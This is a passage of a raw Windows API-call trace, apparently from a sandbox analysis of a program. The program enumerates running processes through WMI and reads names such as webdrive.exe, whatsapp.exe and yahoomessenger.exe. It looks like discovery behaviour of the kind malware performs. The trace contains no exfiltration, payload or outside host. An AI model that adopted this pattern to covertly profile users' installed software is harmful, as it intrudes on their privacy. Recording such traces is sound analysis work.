(in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.573] IWbemClassObject:Get (in: This=0x5712a58, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27d1f48*=0, plFlavor=0x27d1f4c*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="webdrive.exe", varVal2=0x0), pType=0x27d1f48*=8, plFlavor=0x27d1f4c*=0) returned 0x0 [0279.574] IWbemClassObject:Get (in: This=0x5712a58, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27d1f48*=8, plFlavor=0x27d1f4c*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="webdrive.exe", varVal2=0x0), pType=0x27d1f48*=8, plFlavor=0x27d1f4c*=0) returned 0x0 [0279.574] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x57160b0, puReturned=0x27bb39c | out: apObjects=0x57160b0*=0x5712bf0, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.575] IUnknown:QueryInterface (in: This=0x5712bf0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e0cc | out: ppvObject=0x43e0cc*=0x5712bf0) returned 0x0 [0279.575] IUnknown:QueryInterface (in: This=0x5712bf0, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e080 | out: ppvObject=0x43e080*=0x0) returned 0x80004002 [0279.575] IUnknown:QueryInterface (in: This=0x5712bf0, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43dea8 | out: ppvObject=0x43dea8*=0x0) returned 0x80004002 [0279.576] IUnknown:AddRef (This=0x5712bf0) returned 0x3 [0279.576] IUnknown:QueryInterface (in: This=0x5712bf0, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43d9dc | out: ppvObject=0x43d9dc*=0x0) returned 0x80004002 [0279.576] IUnknown:QueryInterface (in: This=0x5712bf0, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43d98c | out: ppvObject=0x43d98c*=0x0) returned 0x80004002 [0279.576] IUnknown:QueryInterface (in: This=0x5712bf0, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43d998 | out: ppvObject=0x43d998*=0x5712bf4) returned 0x0 [0279.576] IMarshal:GetUnmarshalClass (in: This=0x5712bf4, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.576] IUnknown:Release (This=0x5712bf4) returned 0x3 [0279.576] IUnknown:QueryInterface (in: This=0x5712bf0, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43de8c | out: ppvObject=0x43de8c*=0x0) returned 0x80004002 [0279.577] IUnknown:Release (This=0x5712bf0) returned 0x2 [0279.577] IUnknown:QueryInterface (in: This=0x5712bf0, riid=0x43e424*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x43e420 | out: ppvObject=0x43e420*=0x5712bf0) returned 0x0 [0279.577] IUnknown:AddRef (This=0x5712bf0) returned 0x4 [0279.577] IUnknown:Release (This=0x5712bf0) returned 0x3 [0279.577] IUnknown:Release (This=0x5712bf0) returned 0x2 [0279.577] CoTaskMemFree (pv=0x57160b0) [0279.578] IUnknown:AddRef (This=0x5712bf0) returned 0x3 [0279.578] IWbemClassObject:Get (in: This=0x5712bf0, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.579] IWbemClassObject:Get (in: This=0x5712bf0, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3044\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.579] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.579] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.579] IUnknown:Release (This=0x500344) returned 0x1 [0279.580] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x57160b0) returned 0x0 [0279.580] WbemDefPath:IUnknown:QueryInterface (in: This=0x57160b0, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.580] WbemDefPath:IClassFactory:CreateInstance (in: This=0x57160b0, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x570e548) returned 0x0 [0279.580] WbemDefPath:IUnknown:Release (This=0x57160b0) returned 0x0 [0279.580] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e548, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x570e548) returned 0x0 [0279.581] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e548, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.581] WbemDefPath:IUnknown:AddRef (This=0x570e548) returned 0x3 [0279.581] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e548, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.581] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e548, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.581] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e548, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x57160c0) returned 0x0 [0279.581] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x57160c0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.581] WbemDefPath:IUnknown:Release (This=0x57160c0) returned 0x3 [0279.582] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e548, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.582] WbemDefPath:IUnknown:Release (This=0x570e548) returned 0x2 [0279.582] WbemDefPath:IUnknown:Release (This=0x570e548) returned 0x1 [0279.582] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e548, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x570e548) returned 0x0 [0279.582] WbemDefPath:IUnknown:AddRef (This=0x570e548) returned 0x3 [0279.582] WbemDefPath:IUnknown:Release (This=0x570e548) returned 0x2 [0279.582] WbemDefPath:IWbemPath:SetText (This=0x570e548, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3044\"") returned 0x0 [0279.582] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.582] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.582] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.582] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.582] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.582] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.583] IWbemClassObject:Get (in: This=0x5712bf0, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27d27c8*=0, plFlavor=0x27d27cc*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="whatsapp.exe", varVal2=0x0), pType=0x27d27c8*=8, plFlavor=0x27d27cc*=0) returned 0x0 [0279.583] IWbemClassObject:Get (in: This=0x5712bf0, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27d27c8*=8, plFlavor=0x27d27cc*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="whatsapp.exe", varVal2=0x0), pType=0x27d27c8*=8, plFlavor=0x27d27cc*=0) returned 0x0 [0279.583] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x57160f0, puReturned=0x27bb39c | out: apObjects=0x57160f0*=0x5712d88, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.584] IUnknown:QueryInterface (in: This=0x5712d88, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e0cc | out: ppvObject=0x43e0cc*=0x5712d88) returned 0x0 [0279.584] IUnknown:QueryInterface (in: This=0x5712d88, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e080 | out: ppvObject=0x43e080*=0x0) returned 0x80004002 [0279.584] IUnknown:QueryInterface (in: This=0x5712d88, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43dea8 | out: ppvObject=0x43dea8*=0x0) returned 0x80004002 [0279.585] IUnknown:AddRef (This=0x5712d88) returned 0x3 [0279.585] IUnknown:QueryInterface (in: This=0x5712d88, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43d9dc | out: ppvObject=0x43d9dc*=0x0) returned 0x80004002 [0279.585] IUnknown:QueryInterface (in: This=0x5712d88, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43d98c | out: ppvObject=0x43d98c*=0x0) returned 0x80004002 [0279.585] IUnknown:QueryInterface (in: This=0x5712d88, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43d998 | out: ppvObject=0x43d998*=0x5712d8c) returned 0x0 [0279.585] IMarshal:GetUnmarshalClass (in: This=0x5712d8c, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.585] IUnknown:Release (This=0x5712d8c) returned 0x3 [0279.586] IUnknown:QueryInterface (in: This=0x5712d88, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43de8c | out: ppvObject=0x43de8c*=0x0) returned 0x80004002 [0279.586] IUnknown:Release (This=0x5712d88) returned 0x2 [0279.586] IUnknown:QueryInterface (in: This=0x5712d88, riid=0x43e424*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x43e420 | out: ppvObject=0x43e420*=0x5712d88) returned 0x0 [0279.586] IUnknown:AddRef (This=0x5712d88) returned 0x4 [0279.586] IUnknown:Release (This=0x5712d88) returned 0x3 [0279.586] IUnknown:Release (This=0x5712d88) returned 0x2 [0279.586] CoTaskMemFree (pv=0x57160f0) [0279.586] IUnknown:AddRef (This=0x5712d88) returned 0x3 [0279.587] IWbemClassObject:Get (in: This=0x5712d88, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.587] IWbemClassObject:Get (in: This=0x5712d88, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3052\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.588] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.588] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.588] IUnknown:Release (This=0x500344) returned 0x1 [0279.588] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x57160f0) returned 0x0 [0279.589] WbemDefPath:IUnknown:QueryInterface (in: This=0x57160f0, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.589] WbemDefPath:IClassFactory:CreateInstance (in: This=0x57160f0, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x570e628) returned 0x0 [0279.589] WbemDefPath:IUnknown:Release (This=0x57160f0) returned 0x0 [0279.589] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e628, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x570e628) returned 0x0 [0279.589] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e628, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.590] WbemDefPath:IUnknown:AddRef (This=0x570e628) returned 0x3 [0279.590] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e628, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.590] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e628, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.590] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e628, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x5716100) returned 0x0 [0279.590] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5716100, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.590] WbemDefPath:IUnknown:Release (This=0x5716100) returned 0x3 [0279.590] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e628, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.590] WbemDefPath:IUnknown:Release (This=0x570e628) returned 0x2 [0279.590] WbemDefPath:IUnknown:Release (This=0x570e628) returned 0x1 [0279.591] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e628, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x570e628) returned 0x0 [0279.591] WbemDefPath:IUnknown:AddRef (This=0x570e628) returned 0x3 [0279.591] WbemDefPath:IUnknown:Release (This=0x570e628) returned 0x2 [0279.591] WbemDefPath:IWbemPath:SetText (This=0x570e628, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3052\"") returned 0x0 [0279.591] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.591] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.591] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.591] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.591] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.591] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.591] IWbemClassObject:Get (in: This=0x5712d88, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27d303c*=0, plFlavor=0x27d3040*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="yahoomessenger.exe", varVal2=0x0), pType=0x27d303c*=8, plFlavor=0x27d3040*=0) returned 0x0 [0279.591] IWbemClassObject:Get (in: This=0x5712d88, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27d303c*=8, plFlavor=0x27d3040*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="yahoomessenger.exe", varVal2=0x0), pType=0x27d303c*=8, plFlavor=0x27d3040*=0) returned 0x0 [0279.592] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x5716130, puReturned=0x27bb39c | out: apObjects=0x5716130*=0x5712f20, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.592] IUnknown:QueryInterface (in: This=0x5712f20, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e0cc | out: ppvObject=0x43e0cc*=0x5712f20) returned 0x0 [0279.596] IUnknown:QueryInterface (in: This=0x5712f20, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e080 | out: ppvObject=0x43e080*=0x0) returned 0x80004002 [0279.596] IUnknown:QueryInterface (in: This=0x5712f20, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, 